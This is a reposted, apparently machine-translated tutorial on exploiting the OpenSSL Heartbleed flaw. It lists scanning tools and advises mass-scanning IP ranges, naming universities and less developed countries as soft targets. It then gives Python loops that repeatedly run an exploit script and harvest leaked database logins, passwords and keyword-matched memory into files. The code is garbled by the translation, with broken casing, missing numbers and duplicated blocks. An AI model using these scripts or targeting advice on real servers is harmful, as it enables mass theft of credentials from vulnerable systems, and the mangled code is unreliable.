OpenSSL Heartbleed "Heart Bleed" vulnerability simple attack example

Source: Internet
Author: User

Transferred from: http://www.lijiejie.com/openssl-heartbleed-attack/

  

The openness and prevalence of the OpenSSL Heartbleed vulnerability has excited a lot of people and made others panic.  From the point of view of attack, I already know that the online scanning tools are: 1. Nmap Script SSL-HEARTBLEED.NSE:HTTP://NMAP.ORG/NSEDOC/SCRIPTS/SSL-HEARTBLEED.HTMLNMAP-SV--script=ssl-heartbleed < TARGET&GT;1NMAP-SV--script=ssl-heartbleed <target>2. Jared Stafford's testssl.py:https://gist.github.com/sh1n0b1/101003943. csheartbleedscanner:http://www.crowdstrike.com/community-tools/If you want to search for an attack target in bulk, you can scan the 443 port of the target IP segment directly. Universities and the underdeveloped countries of the Internet are more prone to attack. Get the active host IP address, and then import the scanner. For a specific attack target, you can view what has been read, and use regular expressions to keep pulling the account password. Can also be based on key words, keep catching cookies, accounts and so on. Modify the testssl.py code to not output offset address and non-ASCII characters, find the Hexdump function, modify to: Def hexdump (s): Pdat = ' for B in xrange (0, Len (s), +): l in = [C to C in S[b:b +]] pdat + = '. Join (c if <= Ord (c) <= 126 else '. ') For C in Lin) print '%s '% (Pdat.replace (' ... '),) Print12345678def Hexdump (s): Pdat = ' for B in Xrang  E (0, Len (s), +): Lin = [C for C in S[b:b +]] pdat + = '. Join (c if <= Ord (c) <= 126 Else '. ) for C in Lin) print '%s '% (Pdat.replace (' ... '),) print this will only output a useful ASCII string. 1. Regular expression Grab account import Osimport reimport timeaccounts = []while True:result = Os.popen (' openssl.py '). Read () matches = R E.findall (' "DB": "(. *?)", "Login": "(. *?)", "Password": "(. *?)" ', result) for match in Matches:if match not in Accou Nts:accounts.append (Match) with open (' Accounts.txt ', ' a ') as InFile:inFile.write (St R (Match) + ' \ n ') print ' New account: ', Match time.sleep (1.0) 123456789101112131415import Osimport reimport ti Me accounts = []while True:result = Os.popen (' openssl.py '). Read () matches = Re.findall (' "DB": "(. *?)", "Login": "(. *? "," Password ":" (. *?) "', result) for match in Matches:if match not in Accounts:accounts.append (match ) with open (' Accounts.txt ', ' a ') as InFile:inFile.write (str (match) + ' \ n ') print ' Ne W account: ', Match time.sleep (1.0) The script interval reads the data once a second, and finds the regular matching password, if it didn't appear beforeWrite the Accounts.txt file. This avoids repeatedly writing the same account and password. 2. According to the key words to catch the data if you are not sure of the background address, do not know the login request, the format of the cookie, directly with the key words to grasp the account on the line. Similar to the following code: Import osimport reimport timeaccounts = []while True:result = Os.popen (' openssl.py '). Read () keywords = [' s Ystem ', ' Password ', ' passwd ', ' admin '] for word in keywords:if result.find (word) > 0:print ' new                Data ', Time.asctime () with open (' data_1\\ ' + time.asctime (). Replace (': ', ') + '. txt ', ' W ') as F: F.write (Result) break Time.sleep (1.0) Import Osimport reimport time accounts = []while True:result = O S.popen (' openssl.py '). Read () keywords = [' system ', ' password ', ' passwd ', ' admin '] for word in keywords:if R Esult.find (Word) > 0:print ' new Data ', Time.asctime () with open (' data_1\\ ' + time.asctime (). repl Ace (': ', ') + '. txt ', ' W ') as F:f.write (result) break Time.sleep (1.0) so that once the returned data has a keyword passwd , password, etc., the data will be written to the Data_1 folder under the name of the time.

  

OpenSSL Heartbleed "Heart Bleed" vulnerability simple attack example

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.